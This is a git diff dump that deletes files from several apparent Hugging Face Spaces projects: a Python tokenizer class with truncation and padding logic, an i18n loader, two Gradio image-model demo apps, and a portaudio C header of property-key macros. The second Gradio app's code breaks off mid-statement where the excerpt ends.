``special_tokens_mask``: if adding special tokens, this is a list of [0, 1], with 0 specifying special added - tokens and 1 specifying sequence tokens. - """ - pair = bool(pair_ids is not None) - len_ids = len(ids) - len_pair_ids = len(pair_ids) if pair else 0 - - if return_token_type_ids is None: - return_token_type_ids = "token_type_ids" in self.model_input_names - if return_attention_mask is None: - return_attention_mask = "attention_mask" in self.model_input_names - - encoded_inputs = {} - - # Handle max sequence length - total_len = ( - len_ids - + len_pair_ids - + (self.num_added_tokens(pair=pair) if add_special_tokens else 0) - ) - if max_length and total_len > max_length: - ids, pair_ids, overflowing_tokens = self.truncate_sequences( - ids, - pair_ids=pair_ids, - num_tokens_to_remove=total_len - max_length, - truncation_strategy=truncation_strategy, - stride=stride, - ) - if return_overflowing_tokens: - encoded_inputs["overflowing_tokens"] = overflowing_tokens - encoded_inputs["num_truncated_tokens"] = total_len - max_length - - # Handle special_tokens - if add_special_tokens: - sequence = self.build_inputs_with_special_tokens(ids, pair_ids) - token_type_ids = self.create_token_type_ids_from_sequences(ids, pair_ids) - else: - sequence = ids + pair_ids if pair else ids - token_type_ids = [0] * len(ids) + ([1] * len(pair_ids) if pair else []) - - if return_special_tokens_mask: - if add_special_tokens: - encoded_inputs["special_tokens_mask"] = self.get_special_tokens_mask( - ids, pair_ids - ) - else: - encoded_inputs["special_tokens_mask"] = [0] * len(sequence) - - encoded_inputs["input_ids"] = sequence - if return_token_type_ids: - encoded_inputs["token_type_ids"] = token_type_ids - - if max_length and len(encoded_inputs["input_ids"]) > max_length: - encoded_inputs["input_ids"] = encoded_inputs["input_ids"][:max_length] - if return_token_type_ids: - encoded_inputs["token_type_ids"] = encoded_inputs["token_type_ids"][ - :max_length - ] - if return_special_tokens_mask: - encoded_inputs["special_tokens_mask"] = encoded_inputs[ - "special_tokens_mask" - ][:max_length] - - if max_length is None and len(encoded_inputs["input_ids"]) > self.max_len: - logger.warning( - "Token indices sequence length is longer than the specified maximum sequence length " - "for this model ({} > {}). Running this sequence through the model will result in " - "indexing errors".format(len(ids), self.max_len) - ) - - needs_to_be_padded = pad_to_max_length and ( - max_length - and len(encoded_inputs["input_ids"]) < max_length - or max_length is None - and len(encoded_inputs["input_ids"]) < self.max_len - and self.max_len <= 10000 - ) - - if pad_to_max_length and max_length is None and self.max_len > 10000: - logger.warning( - "Sequence can't be padded as no maximum length is specified and the model maximum length is too high." - ) - - if needs_to_be_padded: - difference = (max_length if max_length is not None else self.max_len) - len( - encoded_inputs["input_ids"] - ) - - if self.padding_side == "right": - if return_attention_mask: - encoded_inputs["attention_mask"] = [1] * len( - encoded_inputs["input_ids"] - ) + [0] * difference - if return_token_type_ids: - encoded_inputs["token_type_ids"] = ( - encoded_inputs["token_type_ids"] - + [self.pad_token_type_id] * difference - ) - if return_special_tokens_mask: - encoded_inputs["special_tokens_mask"] = ( - encoded_inputs["special_tokens_mask"] + [1] * difference - ) - encoded_inputs["input_ids"] = ( - encoded_inputs["input_ids"] + [self.pad_token_id] * difference - ) - elif self.padding_side == "left": - if return_attention_mask: - encoded_inputs["attention_mask"] = [0] * difference + [1] * len( - encoded_inputs["input_ids"] - ) - if return_token_type_ids: - encoded_inputs["token_type_ids"] = [ - self.pad_token_type_id - ] * difference + encoded_inputs["token_type_ids"] - if return_special_tokens_mask: - encoded_inputs["special_tokens_mask"] = [ - 1 - ] * difference + encoded_inputs["special_tokens_mask"] - encoded_inputs["input_ids"] = [ - self.pad_token_id - ] * difference + encoded_inputs["input_ids"] - - else: - raise ValueError("Invalid padding strategy:" + str(self.padding_side)) - - elif return_attention_mask: - encoded_inputs["attention_mask"] = [1] * len(encoded_inputs["input_ids"]) - - # Prepare inputs as tensors if asked - if return_tensors == "tf" and is_tf_available(): - encoded_inputs["input_ids"] = tf.constant([encoded_inputs["input_ids"]]) - - if "token_type_ids" in encoded_inputs: - encoded_inputs["token_type_ids"] = tf.constant( - [encoded_inputs["token_type_ids"]] - ) - - if "attention_mask" in encoded_inputs: - encoded_inputs["attention_mask"] = tf.constant( - [encoded_inputs["attention_mask"]] - ) - - elif return_tensors == "pt" and is_torch_available(): - encoded_inputs["input_ids"] = torch.tensor([encoded_inputs["input_ids"]]) - - if "token_type_ids" in encoded_inputs: - encoded_inputs["token_type_ids"] = torch.tensor( - [encoded_inputs["token_type_ids"]] - ) - - if "attention_mask" in encoded_inputs: - encoded_inputs["attention_mask"] = torch.tensor( - [encoded_inputs["attention_mask"]] - ) - elif return_tensors is not None: - logger.warning( - "Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.".format( - return_tensors - ) - ) - - return encoded_inputs - - def prepare_for_tokenization(self, text, **kwargs): - """Performs any necessary transformations before tokenization""" - return text - - def truncate_sequences( - self, - ids, - pair_ids=None, - num_tokens_to_remove=0, - truncation_strategy="longest_first", - stride=0, - ): - """Truncates a sequence pair in place to the maximum length. - truncation_strategy: string selected in the following options: - - 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length - starting from the longest one at each token (when there is a pair of input sequences). - Overflowing tokens only contains overflow from the first sequence. - - 'only_first': Only truncate the first sequence. raise an error if the first sequence is shorter or equal to than num_tokens_to_remove. - - 'only_second': Only truncate the second sequence - - 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length) - """ - if num_tokens_to_remove <= 0: - return ids, pair_ids, [] - - if truncation_strategy == "longest_first": - overflowing_tokens = [] - for _ in range(num_tokens_to_remove): - if pair_ids is None or len(ids) > len(pair_ids): - overflowing_tokens = [ids[-1]] + overflowing_tokens - ids = ids[:-1] - else: - pair_ids = pair_ids[:-1] - window_len = min(len(ids), stride) - if window_len > 0: - overflowing_tokens = ids[-window_len:] + overflowing_tokens - elif truncation_strategy == "only_first": - assert len(ids) > num_tokens_to_remove - window_len = min(len(ids), stride + num_tokens_to_remove) - overflowing_tokens = ids[-window_len:] - ids = ids[:-num_tokens_to_remove] - elif truncation_strategy == "only_second": - assert pair_ids is not None and len(pair_ids) > num_tokens_to_remove - window_len = min(len(pair_ids), stride + num_tokens_to_remove) - overflowing_tokens = pair_ids[-window_len:] - pair_ids = pair_ids[:-num_tokens_to_remove] - elif truncation_strategy == "do_not_truncate": - raise ValueError( - "Input sequence are too long for max_length. Please select a truncation strategy." - ) - else: - raise ValueError( - "Truncation_strategy should be selected in ['longest_first', 'only_first', 'only_second', 'do_not_truncate']" - ) - return (ids, pair_ids, overflowing_tokens) - - def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None): - if token_ids_1 is None: - return len(token_ids_0) * [0] - return [0] * len(token_ids_0) + [1] * len(token_ids_1) - - def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None): - """ - Build model inputs from a sequence or a pair of sequence for sequence classification tasks - by concatenating and adding special tokens. - A RoBERTa sequence has the following format: - single sequence: X - pair of sequences: A B - """ - if token_ids_1 is None: - return token_ids_0 - return token_ids_0 + token_ids_1 - - def get_special_tokens_mask( - self, token_ids_0, token_ids_1=None, already_has_special_tokens=False - ): - """ - Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding - special tokens using the tokenizer ``prepare_for_model`` or ``encode_plus`` methods. - - Args: - token_ids_0: list of ids (must not contain special tokens) - token_ids_1: Optional list of ids (must not contain special tokens), necessary when fetching sequence ids - for sequence pairs - already_has_special_tokens: (default False) Set to True if the token list is already formated with - special tokens for the model - - Returns: - A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token. - """ - return [0] * ((len(token_ids_1) if token_ids_1 else 0) + len(token_ids_0)) - - def convert_ids_to_tokens(self, ids, skip_special_tokens=False): - """Converts a single index or a sequence of indices (integers) in a token " - (resp.) a sequence of tokens (str), using the vocabulary and added tokens. - - Args: - skip_special_tokens: Don't decode special tokens (self.all_special_tokens). Default: False - """ - if isinstance(ids, int): - if ids in self.added_tokens_decoder: - return self.added_tokens_decoder[ids] - else: - return self._convert_id_to_token(ids) - tokens = [] - for index in ids: - index = int(index) - if skip_special_tokens and index in self.all_special_ids: - continue - if index in self.added_tokens_decoder: - tokens.append(self.added_tokens_decoder[index]) - else: - tokens.append(self._convert_id_to_token(index)) - return tokens - - def _convert_id_to_token(self, index): - raise NotImplementedError - - def convert_tokens_to_string(self, tokens): - """Converts a sequence of tokens (string) in a single string. - The most simple way to do it is ' '.join(self.convert_ids_to_tokens(token_ids)) - but we often want to remove sub-word tokenization artifacts at the same time. - """ - return " ".join(self.convert_ids_to_tokens(tokens)) - - def decode( - self, token_ids, skip_special_tokens=False, clean_up_tokenization_spaces=True - ): - """ - Converts a sequence of ids (integer) in a string, using the tokenizer and vocabulary - with options to remove special tokens and clean up tokenization spaces. - Similar to doing ``self.convert_tokens_to_string(self.convert_ids_to_tokens(token_ids))``. - - Args: - token_ids: list of tokenized input ids. Can be obtained using the `encode` or `encode_plus` methods. - skip_special_tokens: if set to True, will replace special tokens. - clean_up_tokenization_spaces: if set to True, will clean up the tokenization spaces. - """ - filtered_tokens = self.convert_ids_to_tokens( - token_ids, skip_special_tokens=skip_special_tokens - ) - - # To avoid mixing byte-level and unicode for byte-level BPT - # we need to build string separatly for added tokens and byte-level tokens - # cf. https://github.com/huggingface/transformers/issues/1133 - sub_texts = [] - current_sub_text = [] - for token in filtered_tokens: - if skip_special_tokens and token in self.all_special_ids: - continue - if token in self.added_tokens_encoder: - if current_sub_text: - sub_texts.append(self.convert_tokens_to_string(current_sub_text)) - current_sub_text = [] - sub_texts.append(token) - else: - current_sub_text.append(token) - if current_sub_text: - sub_texts.append(self.convert_tokens_to_string(current_sub_text)) - text = " ".join(sub_texts) - - if clean_up_tokenization_spaces: - clean_text = self.clean_up_tokenization(text) - return clean_text - else: - return text - - @property - def special_tokens_map(self): - """A dictionary mapping special token class attribute (cls_token, unk_token...) to their - values ('', ''...) - """ - set_attr = {} - for attr in self.SPECIAL_TOKENS_ATTRIBUTES: - attr_value = getattr(self, "_" + attr) - if attr_value: - set_attr[attr] = attr_value - return set_attr - - @property - def all_special_tokens(self): - """List all the special tokens ('', ''...) mapped to class attributes - (cls_token, unk_token...). - """ - all_toks = [] - set_attr = self.special_tokens_map - for attr_value in set_attr.values(): - all_toks = all_toks + ( - list(attr_value) - if isinstance(attr_value, (list, tuple)) - else [attr_value] - ) - all_toks = list(set(all_toks)) - return all_toks - - @property - def all_special_ids(self): - """List the vocabulary indices of the special tokens ('', ''...) mapped to - class attributes (cls_token, unk_token...). - """ - all_toks = self.all_special_tokens - all_ids = self.convert_tokens_to_ids(all_toks) - return all_ids - - @staticmethod - def clean_up_tokenization(out_string): - """Clean up a list of simple English tokenization artifacts like spaces before punctuations and abreviated forms.""" - out_string = ( - out_string.replace(" .", ".") - .replace(" ?", "?") - .replace(" !", "!") - .replace(" ,", ",") - .replace(" ' ", "'") - .replace(" n't", "n't") - .replace(" 'm", "'m") - .replace(" do not", " don't") - .replace(" 's", "'s") - .replace(" 've", "'ve") - .replace(" 're", "'re") - ) - return out_string - - -class PreTrainedTokenizerFast(PreTrainedTokenizer): - - model_input_names = ["token_type_ids", "attention_mask"] - - def __init__(self, tokenizer: BaseTokenizer, **kwargs): - if tokenizer is None: - raise ValueError("Provided tokenizer cannot be None") - self._tokenizer = tokenizer - - super().__init__(**kwargs) - self.max_len_single_sentence = self.max_len - self.num_added_tokens( - False - ) # take into account special tokens - self.max_len_sentences_pair = self.max_len - self.num_added_tokens( - True - ) # take into account special tokens - - @property - def tokenizer(self): - return self._tokenizer - - @property - def decoder(self): - return self._tokenizer._tokenizer.decoder - - @property - def vocab_size(self): - return self._tokenizer.get_vocab_size(with_added_tokens=False) - - def __len__(self): - return self._tokenizer.get_vocab_size(with_added_tokens=True) - - @PreTrainedTokenizer.bos_token.setter - def bos_token(self, value): - self._bos_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.eos_token.setter - def eos_token(self, value): - self._eos_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.unk_token.setter - def unk_token(self, value): - self._unk_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.sep_token.setter - def sep_token(self, value): - self._sep_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.pad_token.setter - def pad_token(self, value): - self._pad_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.cls_token.setter - def cls_token(self, value): - self._cls_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.mask_token.setter - def mask_token(self, value): - self._mask_token = value - self._update_special_tokens() - - @PreTrainedTokenizer.additional_special_tokens.setter - def additional_special_tokens(self, value): - self._additional_special_tokens = value - self._update_special_tokens() - - def _update_special_tokens(self): - if self._tokenizer is not None: - self._tokenizer.add_special_tokens(self.all_special_tokens) - - def _convert_encoding( - self, - encoding, - return_tensors=None, - return_token_type_ids=None, - return_attention_mask=None, - return_overflowing_tokens=False, - return_special_tokens_mask=False, - return_offsets_mapping=False, - ): - if return_token_type_ids is None: - return_token_type_ids = "token_type_ids" in self.model_input_names - if return_attention_mask is None: - return_attention_mask = "attention_mask" in self.model_input_names - - if return_overflowing_tokens and encoding.overflowing is not None: - encodings = [encoding] + encoding.overflowing - else: - encodings = [encoding] - - encoding_dict = defaultdict(list) - for e in encodings: - encoding_dict["input_ids"].append(e.ids) - - if return_token_type_ids: - encoding_dict["token_type_ids"].append(e.type_ids) - if return_attention_mask: - encoding_dict["attention_mask"].append(e.attention_mask) - if return_special_tokens_mask: - encoding_dict["special_tokens_mask"].append(e.special_tokens_mask) - if return_offsets_mapping: - encoding_dict["offset_mapping"].append( - [e.original_str.offsets(o) for o in e.offsets] - ) - - # Prepare inputs as tensors if asked - if return_tensors == "tf" and is_tf_available(): - encoding_dict["input_ids"] = tf.constant(encoding_dict["input_ids"]) - if "token_type_ids" in encoding_dict: - encoding_dict["token_type_ids"] = tf.constant( - encoding_dict["token_type_ids"] - ) - - if "attention_mask" in encoding_dict: - encoding_dict["attention_mask"] = tf.constant( - encoding_dict["attention_mask"] - ) - - elif return_tensors == "pt" and is_torch_available(): - encoding_dict["input_ids"] = torch.tensor(encoding_dict["input_ids"]) - if "token_type_ids" in encoding_dict: - encoding_dict["token_type_ids"] = torch.tensor( - encoding_dict["token_type_ids"] - ) - - if "attention_mask" in encoding_dict: - encoding_dict["attention_mask"] = torch.tensor( - encoding_dict["attention_mask"] - ) - elif return_tensors is not None: - logger.warning( - "Unable to convert output to tensors format {}, PyTorch or TensorFlow is not available.".format( - return_tensors - ) - ) - - return encoding_dict - - def _convert_token_to_id_with_added_voc(self, token): - id = self._tokenizer.token_to_id(token) - if id is None: - return self.unk_token_id - return id - - def _convert_id_to_token(self, index): - return self._tokenizer.id_to_token(int(index)) - - def convert_tokens_to_string(self, tokens): - return self._tokenizer.decode(tokens) - - def add_tokens(self, new_tokens): - if isinstance(new_tokens, str): - new_tokens = [new_tokens] - return self._tokenizer.add_tokens(new_tokens) - - def add_special_tokens(self, special_tokens_dict): - added = super().add_special_tokens(special_tokens_dict) - self._update_special_tokens() - return added - - def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None): - if token_ids_1 is None: - return token_ids_0 - else: - return token_ids_0 + token_ids_1 - - def num_added_tokens(self, pair=False): - return self.tokenizer.num_special_tokens_to_add(pair) - - def tokenize(self, text, **kwargs): - return self.tokenizer.encode(text).tokens - - def batch_encode_plus( - self, - batch_text_or_text_pairs: Optional[Union[List[str], List[Tuple[str]]]] = None, - add_special_tokens: bool = True, - max_length: Optional[int] = None, - stride: int = 0, - truncation_strategy: str = "longest_first", - pad_to_max_length: bool = False, - return_tensors: Optional[str] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_mask: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_mask: bool = False, - return_offsets_mapping: bool = False, - **kwargs - ): - if not add_special_tokens: - logger.warning( - "Fast tokenizers add special tokens by default. To remove special tokens, please specify" - "`add_special_tokens=False` during the initialisation rather than when calling `encode`," - "`encode_plus` or `batch_encode_plus`." - ) - - # Needed if we have to return a tensor - pad_to_max_length = pad_to_max_length or (return_tensors is not None) - - # Throw an error if we can pad because there is no padding token - if pad_to_max_length and self.pad_token_id is None: - raise ValueError( - "Unable to set proper padding strategy as the tokenizer does not have a padding token" - ) - - # Set the truncation and padding strategy and restore the initial configuration - with truncate_and_pad( - tokenizer=self._tokenizer, - max_length=max_length, - stride=stride, - strategy=truncation_strategy, - pad_to_max_length=pad_to_max_length, - padding_side=self.padding_side, - pad_token_id=self.pad_token_id, - pad_token_type_id=self.pad_token_type_id, - pad_token=self._pad_token, - ): - - if not isinstance(batch_text_or_text_pairs, list): - raise TypeError( - "batch_text_or_text_pairs has to be a list (got {})".format( - type(batch_text_or_text_pairs) - ) - ) - - # Avoid thread overhead if only one example. - if len(batch_text_or_text_pairs) == 1: - if isinstance(batch_text_or_text_pairs[0], (tuple, list)): - tokens = self._tokenizer.encode(*batch_text_or_text_pairs[0]) - else: - tokens = self._tokenizer.encode(batch_text_or_text_pairs[0]) - tokens = [tokens] - else: - tokens = self._tokenizer.encode_batch(batch_text_or_text_pairs) - - # Convert encoding to dict - tokens = [ - self._convert_encoding( - encoding=encoding, - return_tensors=return_tensors, - return_token_type_ids=return_token_type_ids, - return_attention_mask=return_attention_mask, - return_overflowing_tokens=return_overflowing_tokens, - return_special_tokens_mask=return_special_tokens_mask, - return_offsets_mapping=return_offsets_mapping, - ) - for encoding in tokens - ] - - # Sanitize the output to have dict[list] from list[dict] - sanitized = {} - for key in tokens[0].keys(): - stack = [e for item in tokens for e in item[key]] - if return_tensors == "tf": - stack = tf.stack(stack, axis=0) - elif return_tensors == "pt": - stack = torch.stack(stack, dim=0) - elif not return_tensors and len(stack) == 1: - stack = stack[0] - - sanitized[key] = stack - - # If returning overflowing tokens, we need to return a mapping - # from the batch idx to the original sample - if return_overflowing_tokens: - overflow_to_sample_mapping = [ - i if len(item["input_ids"]) == 1 else [i] * len(item["input_ids"]) - for i, item in enumerate(tokens) - ] - sanitized["overflow_to_sample_mapping"] = overflow_to_sample_mapping - return sanitized - - def encode_plus( - self, - text: str, - text_pair: Optional[str] = None, - add_special_tokens: bool = False, - max_length: Optional[int] = None, - pad_to_max_length: bool = False, - stride: int = 0, - truncation_strategy: str = "longest_first", - return_tensors: Optional[bool] = None, - return_token_type_ids: Optional[bool] = None, - return_attention_mask: Optional[bool] = None, - return_overflowing_tokens: bool = False, - return_special_tokens_mask: bool = False, - return_offsets_mapping: bool = False, - **kwargs - ): - batched_input = [(text, text_pair)] if text_pair else [text] - batched_output = self.batch_encode_plus( - batched_input, - add_special_tokens=add_special_tokens, - max_length=max_length, - stride=stride, - truncation_strategy=truncation_strategy, - return_tensors=return_tensors, - return_token_type_ids=return_token_type_ids, - return_attention_mask=return_attention_mask, - return_overflowing_tokens=return_overflowing_tokens, - return_special_tokens_mask=return_special_tokens_mask, - return_offsets_mapping=return_offsets_mapping, - pad_to_max_length=pad_to_max_length, - **kwargs, - ) - - # Return tensor is None, then we can remove the leading batch axis - if not return_tensors: - return { - key: value[0] if isinstance(value[0], list) else value - for key, value in batched_output.items() - } - else: - return batched_output - - def decode( - self, token_ids, skip_special_tokens=False, clean_up_tokenization_spaces=True - ): - text = self.tokenizer.decode(token_ids, skip_special_tokens) - - if clean_up_tokenization_spaces: - clean_text = self.clean_up_tokenization(text) - return clean_text - else: - return text - - def save_vocabulary(self, save_directory): - if os.path.isdir(save_directory): - files = self._tokenizer.save(save_directory) - else: - folder, file = os.path.split(os.path.abspath(save_directory)) - files = self._tokenizer.save(folder, name=file) - - return tuple(files) - - -def trim_batch( - input_ids, - pad_token_id, - attention_mask=None, -): - """Remove columns that are populated exclusively by pad_token_id""" - keep_column_mask = input_ids.ne(pad_token_id).any(dim=0) - if attention_mask is None: - return input_ids[:, keep_column_mask] - else: - return (input_ids[:, keep_column_mask], attention_mask[:, keep_column_mask]) diff --git a/spaces/aliceoq/vozes-da-loirinha/i18n.py b/spaces/aliceoq/vozes-da-loirinha/i18n.py deleted file mode 100644 index 37f310fadd0b48b2f364877158fb2105d645fc03..0000000000000000000000000000000000000000 --- a/spaces/aliceoq/vozes-da-loirinha/i18n.py +++ /dev/null @@ -1,28 +0,0 @@ -import locale -import json -import os - - -def load_language_list(language): - with open(f"./i18n/{language}.json", "r", encoding="utf-8") as f: - language_list = json.load(f) - return language_list - - -class I18nAuto: - def __init__(self, language=None): - if language in ["Auto", None]: - language = locale.getdefaultlocale()[ - 0 - ] # getlocale can't identify the system's language ((None, None)) - if not os.path.exists(f"./i18n/{language}.json"): - language = "en_US" - self.language = language - # print("Use Language:", language) - self.language_map = load_language_list(language) - - def __call__(self, key): - return self.language_map.get(key, key) - - def print(self): - print("Use Language:", self.language) diff --git a/spaces/allknowingroger/Image-Models-Test197/app.py b/spaces/allknowingroger/Image-Models-Test197/app.py deleted file mode 100644 index 4e9207f1252a5154dcfd3befe910becd01304e50..0000000000000000000000000000000000000000 --- a/spaces/allknowingroger/Image-Models-Test197/app.py +++ /dev/null @@ -1,144 +0,0 @@ -import gradio as gr -# import os -# import sys -# from pathlib import Path -import time - -models =[ - "artificialguybr/CuteCartoonRedmond-V2", - "Yntec/3DRendering", - "lixiao/sdxl-bg_0201-lora-sdxl", - "JassTxM/my-pet-dog", - "vivym/chessman-sd2.1-lora-00", - "Ailyth/Toro_cat", - "DeadfoxX/glitch_lora", - "Varnii/alex_sdxl", - "artificialguybr/StoryBookRedmond-V2", -] - - -model_functions = {} -model_idx = 1 -for model_path in models: - try: - model_functions[model_idx] = gr.Interface.load(f"models/{model_path}", live=False, preprocess=True, postprocess=False) - except Exception as error: - def the_fn(txt): - return None - model_functions[model_idx] = gr.Interface(fn=the_fn, inputs=["text"], outputs=["image"]) - model_idx+=1 - - -def send_it_idx(idx): - def send_it_fn(prompt): - output = (model_functions.get(str(idx)) or model_functions.get(str(1)))(prompt) - return output - return send_it_fn - -def get_prompts(prompt_text): - return prompt_text - -def clear_it(val): - if int(val) != 0: - val = 0 - else: - val = 0 - pass - return val - -def all_task_end(cnt,t_stamp): - to = t_stamp + 60 - et = time.time() - if et > to and t_stamp != 0: - d = gr.update(value=0) - tog = gr.update(value=1) - #print(f'to: {to} et: {et}') - else: - if cnt != 0: - d = gr.update(value=et) - else: - d = gr.update(value=0) - tog = gr.update(value=0) - #print (f'passing: to: {to} et: {et}') - pass - return d, tog - -def all_task_start(): - print("\n\n\n\n\n\n\n") - t = time.gmtime() - t_stamp = time.time() - current_time = time.strftime("%H:%M:%S", t) - return gr.update(value=t_stamp), gr.update(value=t_stamp), gr.update(value=0) - -def clear_fn(): - nn = len(models) - return tuple([None, *[None for _ in range(nn)]]) - - - -with gr.Blocks(title="SD Models") as my_interface: - with gr.Column(scale=12): - # with gr.Row(): - # gr.Markdown("""- Primary prompt: 你想画的内容(英文单词,如 a cat, 加英文逗号效果更好;点 Improve 按钮进行完善)\n- Real prompt: 完善后的提示词,出现后再点右边的 Run 按钮开始运行""") - with gr.Row(): - with gr.Row(scale=6): - primary_prompt=gr.Textbox(label="Prompt", value="") - # real_prompt=gr.Textbox(label="Real prompt") - with gr.Row(scale=6): - # improve_prompts_btn=gr.Button("Improve") - with gr.Row(): - run=gr.Button("Run",variant="primary") - clear_btn=gr.Button("Clear") - with gr.Row(): - sd_outputs = {} - model_idx = 1 - for model_path in models: - with gr.Column(scale=3, min_width=320): - with gr.Box(): - sd_outputs[model_idx] = gr.Image(label=model_path) - pass - model_idx += 1 - pass - pass - - with gr.Row(visible=False): - start_box=gr.Number(interactive=False) - end_box=gr.Number(interactive=False) - tog_box=gr.Textbox(value=0,interactive=False) - - start_box.change( - all_task_end, - [start_box, end_box], - [start_box, tog_box], - every=1, - show_progress=False) - - primary_prompt.submit(all_task_start, None, [start_box, end_box, tog_box]) - run.click(all_task_start, None, [start_box, end_box, tog_box]) - runs_dict = {} - model_idx = 1 - for model_path in models: - runs_dict[model_idx] = run.click(model_functions[model_idx], inputs=[primary_prompt], outputs=[sd_outputs[model_idx]]) - model_idx += 1 - pass - pass - - # improve_prompts_btn_clicked=improve_prompts_btn.click( - # get_prompts, - # inputs=[primary_prompt], - # outputs=[primary_prompt], - # cancels=list(runs_dict.values())) - clear_btn.click( - clear_fn, - None, - [primary_prompt, *list(sd_outputs.values())], - cancels=[*list(runs_dict.values())]) - tog_box.change( - clear_it, - tog_box, - tog_box, - cancels=[*list(runs_dict.values())]) - -my_interface.queue(concurrency_count=600, status_update_rate=1) -my_interface.launch(inline=True, show_api=False) - \ No newline at end of file diff --git a/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/propkeydef.h b/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/propkeydef.h deleted file mode 100644 index a361044e56a71f1139e10d0fd1d9579c75a1ec2b..0000000000000000000000000000000000000000 --- a/spaces/amarchheda/ChordDuplicate/portaudio/src/hostapi/wasapi/mingw-include/propkeydef.h +++ /dev/null @@ -1,26 +0,0 @@ -#ifndef PID_FIRST_USABLE -#define PID_FIRST_USABLE 2 -#endif - -#ifndef REFPROPERTYKEY -#ifdef __cplusplus -#define REFPROPERTYKEY const PROPERTYKEY & -#else // !__cplusplus -#define REFPROPERTYKEY const PROPERTYKEY * __MIDL_CONST -#endif // __cplusplus -#endif //REFPROPERTYKEY - -#ifdef DEFINE_PROPERTYKEY -#undef DEFINE_PROPERTYKEY -#endif - -#ifdef INITGUID -#define DEFINE_PROPERTYKEY(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8, pid) EXTERN_C const PROPERTYKEY DECLSPEC_SELECTANY name = { { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } }, pid } -#else -#define DEFINE_PROPERTYKEY(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8, pid) EXTERN_C const PROPERTYKEY name -#endif // INITGUID - -#ifndef IsEqualPropertyKey -#define IsEqualPropertyKey(a, b) (((a).pid == (b).pid) && IsEqualIID((a).fmtid, (b).fmtid) ) -#endif // IsEqualPropertyKey - diff --git a/spaces/animeartstudio/ArtModels/app.py b/spaces/animeartstudio/ArtModels/app.py deleted file mode 100644 index 38b9f89ba979227ba5c3e32fd194fceaacb23e6a..0000000000000000000000000000000000000000 --- a/spaces/animeartstudio/ArtModels/app.py +++ /dev/null @@ -1,130 +0,0 @@ -import gradio as gr -import os -import sys -from pathlib import Path - -models = [ - {"name": "Anything Midjourney 4.1", "url": "Joeythemonster/anything-midjourney-v-4-1"}, - {"name": "Chaos and Order", "url": "Guizmus/SDArt_ChaosAndOrder768"}, - {"name": "Chilloutclara", "url": "Fred99774/chilloutvlara"}, - {"name": "Comic Diffusion", "url": "ogkalu/Comic-Diffusion"}, - {"name": "Cosmic Horros 768", "url": "Guizmus/SDArt_cosmichorrors768"}, - {"name": "Cosmic Horros", "url": "Guizmus/SDArt_cosmichorrors"}, - {"name": "DGSpitzer", "url": "DGSpitzer/DGSpitzer-Art-Diffusion"}, - {"name": "Dungeons and Diffusion", "url": "0xJustin/Dungeons-and-Diffusion"}, - {"name": "Elden Ring", "url": "nitrosocke/elden-ring-diffusion"}, - {"name": "Epic Diffusion 1.1", "url": "johnslegers/epic-diffusion-v1.1"}, - {"name": "Epic Diffusion", "url": "johnslegers/epic-diffusion"}, - {"name": "EpicMix Realism", "url": "Duskfallcrew/EpicMix_Realism"}, - {"name": "Fantasy Mix", "url": "theintuitiveye/FantasyMix"}, - {"name": "Girl New 1", "url": "Fred99774/girlnew1"}, - {"name": "Lit 6B", "url": "hakurei/lit-6B"}, - {"name": "Luna Diffusion", "url": "proximasanfinetuning/luna-diffusion"}, - {"name": "Midjourney 4.0", "url": "flax/midjourney-v4-diffusion"}, - {"name": "Midjourney 4.1", "url": "Joeythemonster/anything-midjourney-v-4-1"}, - {"name": "Mo-Di Diffusion", "url": "nitrosocke/mo-di-diffusion"}, - {"name": "Nitro Diffusion", "url": "nitrosocke/Nitro-Diffusion"}, - {"name": "Openjourney V2", "url": "prompthero/openjourney-v2"}, - {"name": "Openjourney", "url": "prompthero/openjourney"}, - {"name": "Seek Art Mega", "url": "coreco/seek.art_MEGA"}, - {"name": "Something", "url": "Guizmus/SDArt_something"}, - {"name": "Spider Verse diffusion", "url": "nitrosocke/spider-verse-diffusion"}, - {"name": "Vintedois 1.0", "url": "22h/vintedois-diffusion-v0-1"}, - {"name": "Vintedois 2.0", "url": "22h/vintedois-diffusion-v0-2"}, - {"name": "❤ ART STYLES ==========", "url": "joachimsallstrom/Double-Exposure-Diffusion"}, - {"name": "Balloon Art", "url": "Fictiverse/Stable_Diffusion_BalloonArt_Model"}, - {"name": "Double Exposure Diffusion", "url": "joachimsallstrom/Double-Exposure-Diffusion"}, - {"name": "Fluid Art", "url": "Fictiverse/Stable_Diffusion_FluidArt_Model"}, - {"name": "GTA5 Artwork Diffusion", "url": "ItsJayQz/GTA5_Artwork_Diffusion"}, - {"name": "Marvel WhatIf Diffusion", "url": "ItsJayQz/Marvel_WhatIf_Diffusion"}, - {"name": "Naruto Diffuser", "url": "lambdalabs/sd-naruto-diffusers"}, - {"name": "Papercut", "url": "Fictiverse/Stable_Diffusion_PaperCut_Model"}, - {"name": "Pokemon Diffuser", "url": "lambdalabs/sd-pokemon-diffusers"}, - {"name": "Synthwave Punk 2", "url": "ItsJayQz/SynthwavePunk-v2"}, - {"name": "Valorant Diffusion", "url": "ItsJayQz/Valorant_Diffusion"}, - {"name": "Van Gogh Diffusion", "url": "dallinmackay/Van-Gogh-diffusion"}, - {"name": "Vectorartz Diffusion", "url": "coder119/Vectorartz_Diffusion"}, - {"name": "VoxelArt", "url": "Fictiverse/Stable_Diffusion_VoxelArt_Model"}, -] - -current_model = models[0] - -text_gen = gr.Interface.load("spaces/daspartho/prompt-extend") - -models2 = [] -for model in models: - model_url = 